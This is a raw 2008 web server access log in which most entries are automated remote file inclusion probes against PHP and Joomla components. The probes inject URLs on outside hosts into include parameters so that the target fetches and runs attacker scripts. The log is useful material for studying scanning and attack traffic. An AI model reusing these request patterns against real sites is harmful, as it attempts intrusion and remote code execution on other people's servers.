65.55.211.28 - - [25/Jun/2008:09:41:56 -0700] "GET /bikes/dteel/2008_02_08/?D=D HTTP/1.1" 200 1132 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:09:42:04 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:09:42:04 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:42:05 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:42:05 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:42:05 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:42:11 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:42:11 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:09:42:15 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:09:42:15 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:09:42:16 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:09:42:18 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:42:18 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:09:42:18 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:09:42:18 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:09:42:19 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:09:42:19 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:09:42:19 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
68.76.31.154 - - [25/Jun/2008:09:42:19 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://208.46.111.12/images/images.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:42:23 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:42:23 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:42:24 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:42:24 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:42:26 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:42:27 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:42:28 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/siskagita/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:42:31 -0700] "GET /administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:42:32 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:42:32 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:42:32 -0700] "GET /logs/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:42:32 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:42:43 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
156.17.223.158 - - [25/Jun/2008:09:42:47 -0700] "GET //components/com_bsq_sitestats/external/rssfeed.phphttp://www.lachsfarm.de/board//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
156.17.223.158 - - [25/Jun/2008:09:42:47 -0700] "GET /logs//components/com_bsq_sitestats/external/rssfeed.phphttp://www.lachsfarm.de/board//language/ctrl.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:42:53 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:43:10 -0700] "GET /logs/access.log//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:43:10 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:43:11 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:43:22 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:43:23 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:43:23 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:09:43:27 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
69.20.61.23 - - [25/Jun/2008:09:43:35 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig%5Bcfg_serverpath%5D=http://avast4ever.xpg.com.br/TT?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
216.117.152.168 - - [25/Jun/2008:09:43:37 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
80.67.20.173 - - [25/Jun/2008:09:43:39 -0700] "GET /phphtml.php?htmlclass_path=http://hate.tao21.de//files/files/contrm.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
80.67.20.173 - - [25/Jun/2008:09:43:39 -0700] "GET /logs/phphtml.php?htmlclass_path=http://hate.tao21.de//files/files/contrm.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
87.246.68.52 - - [25/Jun/2008:09:43:43 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:43:54 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:43:55 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:43:55 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:43:56 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/alba.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
8.2.208.2 - - [25/Jun/2008:09:44:04 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:44:05 -0700] "GET /logs/access_080304.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:44:07 -0700] "GET /?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 18403 "-" "libwww-perl/5.810" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:44:08 -0700] "GET /logs/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 200 53419 "-" "libwww-perl/5.810" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:09:44:36 -0700] "GET /logs//components/com_flyspray/startdown.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:09:44:36 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.52.139.226 - - [25/Jun/2008:09:44:37 -0700] "GET /logs/access_080307.log/?mosConfig_absolute_path=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.115.144.54 - - [25/Jun/2008:09:44:39 -0700] "GET /logs/access_080106.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.proostjes.be/calendar/help01.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:44:47 -0700] "GET /logs/index.php?open=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [25/Jun/2008:09:44:50 -0700] "GET /index.php?open=http://www.hamnation.com//forums/Skin/id.txt?? HTTP/1.1" 200 18423 "-" "libwww-perl/5.805" "www.dmulk.com"
66.80.93.168 - - [25/Jun/2008:09:44:51 -0700] "GET /logs/access_080118.log//inc/cmses/aedatingCMS.php?dir[inc]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Jun/2008:09:44:51 -0700] "GET //inc/cmses/aedatingCMS.php?dir[inc]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [25/Jun/2008:09:44:52 -0700] "GET /logs//inc/cmses/aedatingCMS.php?dir[inc]=http://www.topgas.co.uk/forum/succes?http://www.fmweb.it/images/save_7.png?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:09:45:01 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:09:45:01 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/coi.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; .NET CLR 2.0.50727)" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:45:02 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:09:45:02 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
89.218.85.18 - - [25/Jun/2008:09:45:02 -0700] "GET /logs//administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:45:02 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:45:03 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:45:21 -0700] "GET //administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=http://www.goodimmo.com/romid.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:45:41 -0700] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:45:42 -0700] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:45:42 -0700] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.140.73.234 - - [25/Jun/2008:09:45:46 -0700] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:03 -0700] "GET /logs/access_080127.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:04 -0700] "GET /index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:04 -0700] "GET /logs/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:06 -0700] "GET /logs/access_080127.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:06 -0700] "GET /index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:07 -0700] "GET /logs/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:07 -0700] "GET /logs/access_080127.log/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:07 -0700] "GET /index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:47:08 -0700] "GET /logs/index1.php?=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.106 - - [25/Jun/2008:09:47:24 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.106 - - [25/Jun/2008:09:47:24 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.backbreakacres.com/test1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:09:47:43 -0700] "GET /logs/access_071219.log//components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:48:14 -0700] "GET /logs/access_080211.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.22.157 - - [25/Jun/2008:09:48:15 -0700] "GET /logs/access.log HTTP/1.0" 200 96145 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:09:48:15 -0700] "GET //components/com_flyspray/startdown.php?file=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.29.73.67 - - [25/Jun/2008:09:48:16 -0700] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:48:19 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
79.171.18.36 - - [25/Jun/2008:09:48:19 -0700] "GET /logs/access_080127.log//modules/vwar/admin/admin.php?vwar_root=http://www.exceldozai.com//mambots/system/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:09:48:20 -0700] "GET /logs/scanhttp://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.106.202.240 - - [25/Jun/2008:09:48:20 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.249.194 - - [25/Jun/2008:09:48:20 -0700] "GET /logs/access_080201.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://www.transganadera.com/phpSecurePages/romania.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.20.175.69 - - [25/Jun/2008:09:48:22 -0700] "GET /scanhttp://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
61.63.1.134 - - [25/Jun/2008:09:48:35 -0700] "GET /logs/access_080118.log//components/com_simpleboard/file_upload.php?sbp=http://www.sandmanwv.com/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:09:48:52 -0700] "GET /logs//components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.25 - - [25/Jun/2008:09:48:52 -0700] "GET //components/com_pcchess/include.pcchess.php?mosConfig_absolute_path=http://www.organicsalive.org/webyep-system/program/images/.bash/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:48:55 -0700] "GET /errors.php?error=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
195.12.53.176 - - [25/Jun/2008:09:48:55 -0700] "GET /logs/errors.php?error=http://www.geocities.com/distovario/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/2.0 (compatible; MSIE 3.01; Windows 98)" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:49:27 -0700] "GET /logs/?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 53419 "-" "libwww-perl/5.805" "www.dmulk.com"
89.111.176.84 - - [25/Jun/2008:09:49:31 -0700] "GET /?mosConfig_absolute_path=http://fan.sleepsycho.com/bajocdm2.txt????? HTTP/1.1" 200 18437 "-" "libwww-perl/5.805" "www.dmulk.com"
62.75.204.30 - - [25/Jun/2008:09:49:39 -0700] "GET /logs/access.log//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.arepassinfronteras.com/foro/uploads/profile/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
